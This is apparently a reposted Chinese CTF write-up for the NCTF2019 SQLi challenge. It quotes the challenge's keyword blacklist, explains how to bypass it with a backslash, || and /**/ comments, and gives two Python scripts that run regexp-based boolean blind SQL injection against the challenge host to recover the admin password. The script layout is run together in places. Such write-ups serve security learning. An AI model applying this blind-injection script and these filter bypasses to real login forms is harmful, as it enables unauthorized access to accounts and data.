当前位置: 首页 > news >正文

[NCTF2019]SQLi regexp 盲注

/robots.txt

访问一下

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";If $_POST['passwd'] === admin's password,Then you will get the flag;

这里实现了过滤

说需要admin的密码

这里我们可以发现没有过滤 \ 所以username 我们可以通过 \ 来绕过

所以我们通过passwd注入

or 使用 || 代替

然后空格使用 /**/代替

我们尝试登入

发现进行302跳转 但是没办法

所以还是要通过 查询admin passwd 进入

所以我们开始

写注入的代码 这里很多都被过滤了

但是放出了 ^和 regexp

正则

我们可以通过正则来读取

和下面的例子一样

select (select 'b') > (select 'abc')  这个时候会返回0select name regexp "^a"     这里的name是admin   //我自己的数据库返回的是1

所以我们可以通过 布尔注入实现这道题的读取

import time
from urllib import parseimport requests
import stringbaseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'def add(flag):res=''res += flagreturn  res
flag=''
ascii_chars = string.ascii_letters + string.digits + string.punctuation
print(ascii_chars)
for i in range(20):for j in ascii_chars:data = add(flag+j)paylaod1 = paylaod.format(data,parse.unquote('%00'))print(paylaod1)data={'username':'\\','passwd':paylaod1}re=requests.post(url=baseurl,data=data)if re.status_code == 429:time.sleep(0.5)if "welcome.php" in re.text:flag += jprint(flag)break

这里很坑 上面的 字符*的时候会循环输出        

you*u*u*u

不知道是环境问题还是什么

所以我们现在替换

import time
from urllib import parseimport requests
import stringbaseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'def add(flag):res=''res += flagreturn  res
flag=''
ascii_chars = string.ascii_letters+string.digits+"_"
for i in range(20):for j in ascii_chars:data = add(flag+j)paylaod1 = paylaod.format(data,parse.unquote('%00'))data={'username':'\\','passwd':paylaod1}re=requests.post(url=baseurl,data=data)if re.status_code == 429:time.sleep(0.5)if "welcome.php" in re.text:flag += jprint(flag)break

这个就可以爆出值了

you_will_never_know7788990

http://www.lryc.cn/news/191576.html

相关文章:

  • 通过webpack创建并打包js库到npm仓库
  • 【Java 进阶篇】深入了解JavaScript中的函数
  • 谷歌 Chrome 浏览器正推进“追踪保护”功能
  • Excel 自动提取某一列不重复值
  • 【TensorFlow2 之011】TF 如何使用数据增强提高模型性能?
  • Hadoop 安装教程 (Mac m1/m2版)
  • Docker - 网络模式与容器网络互连
  • 【基础篇】三、Flink集群角色、系统架构以及作业提交流程
  • 第一个2DGodot游戏-从零开始-逐步解析
  • 大数据学习(7)-hive文件格式总结
  • GRU的 电影评论情感分析 - python 深度学习 情感分类 计算机竞赛
  • kafka简述
  • 《RISC-V体系结构编程与实践》的benos_payload程序——mysbi跳转到benos分析
  • ad5665r STM32 GD32 IIC驱动设计
  • TensorFlow入门(十六、识别模糊手写图片)
  • CSwin Transformer 学习笔记
  • Linux上通过mysqldump命令实现自动备份
  • v-model与.sync的区别
  • Linux---进程(1)
  • C# U2Net Portrait 跨界肖像画
  • 华为云云耀云服务器L实例评测|华为云耀云服务器L实例评测包管理工具安装软件(六)
  • 在PYTHON中用zlib模块对文本进行压缩,写入图片的EXIF中,后在C#中读取EXIF并用SharpZipLib进行解压获取压缩前文本
  • centos / oracle Linux 常用运维命令讲解
  • EMNLP 2023 录用论文公布,速看NLP各领域最新SOTA方案
  • 互联网Java工程师面试题·Java 并发编程篇·第三弹
  • mac jdk的环境变量路径,到底在哪里?
  • PyQt5 PyQt6 Designer 的安装
  • 数据库:Hive转Presto(四)
  • 16基于otsuf方法的图像分割,程序已调通,可更换自己的图片进行分割,程序具有详细的代码注释,可轻松掌握。基于MATLAB平台,需要直接拍下。
  • 2、使用阿里云镜像加速器提升Docker的资源下载速度